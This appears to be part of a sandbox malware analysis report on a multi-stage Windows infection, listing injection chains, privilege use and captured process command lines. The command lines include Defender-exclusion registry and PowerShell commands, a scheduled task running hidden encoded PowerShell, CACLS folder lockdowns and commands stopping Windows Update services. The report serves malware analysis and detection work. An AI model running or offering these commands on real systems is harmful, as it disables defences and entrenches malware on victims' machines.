Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\DllHost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2708 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\80D3.exe
PID 1204 wrote to memory of 2500 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\82F6.exe
PID 1204 wrote to memory of 2500 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\82F6.exe
PID 1204 wrote to memory of 2500 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\82F6.exe
PID 1204 wrote to memory of 2500 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\82F6.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2708 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 1204 wrote to memory of 2560 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2560 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2560 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2660 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1204 wrote to memory of 580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8568.exe
PID 1204 wrote to memory of 580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8568.exe
PID 1204 wrote to memory of 580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8568.exe
PID 1204 wrote to memory of 580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8568.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2308 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 964 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 1204 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8866.exe
PID 1204 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8866.exe
PID 1204 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8866.exe
PID 1204 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8866.exe
PID 2560 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2560 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2560 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1684 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 1204 wrote to memory of 1524 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8AC7.exe
PID 1204 wrote to memory of 1524 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8AC7.exe
PID 1204 wrote to memory of 1524 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8AC7.exe
PID 1204 wrote to memory of 1524 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8AC7.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe

"C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe"

C:\Users\Admin\AppData\Local\Temp\80D3.exe

C:\Users\Admin\AppData\Local\Temp\80D3.exe

C:\Users\Admin\AppData\Local\Temp\82F6.exe

C:\Users\Admin\AppData\Local\Temp\82F6.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\844F.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\8568.exe

C:\Users\Admin\AppData\Local\Temp\8568.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\8866.exe

C:\Users\Admin\AppData\Local\Temp\8866.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\8AC7.exe

C:\Users\Admin\AppData\Local\Temp\8AC7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 268

C:\Users\Admin\AppData\Local\Temp\12BC.exe

C:\Users\Admin\AppData\Local\Temp\12BC.exe

C:\Users\Admin\AppData\Local\Temp\155C.exe

C:\Users\Admin\AppData\Local\Temp\155C.exe

C:\Users\Admin\AppData\Local\Temp\17EC.exe

C:\Users\Admin\AppData\Local\Temp\17EC.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 520

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp" /SL4 $10274 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Users\Admin\AppData\Local\Temp\54CE.exe

C:\Users\Admin\AppData\Local\Temp\54CE.exe

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gvVZWiGbX" /SC once /ST 02:05:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Users\Admin\AppData\Local\Temp\6CE1.exe

C:\Users\Admin\AppData\Local\Temp\6CE1.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {B512842F-1D6F-4291-A943-617091D66294} S-1-5-21-3618187007-3650799920-3290345941-1000:BPDFUYWR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gvVZWiGbX"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045518.log C:\Windows\Logs\CBS\CbsPersist_20231025045518.cab

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

